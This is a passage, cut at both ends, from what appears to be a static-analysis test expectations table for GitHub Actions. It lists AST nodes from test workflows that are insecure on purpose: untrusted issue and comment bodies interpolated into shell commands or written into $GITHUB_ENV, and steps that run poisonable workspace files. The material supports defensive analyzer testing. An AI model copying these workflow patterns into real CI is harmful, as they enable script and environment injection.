'${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | .github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| 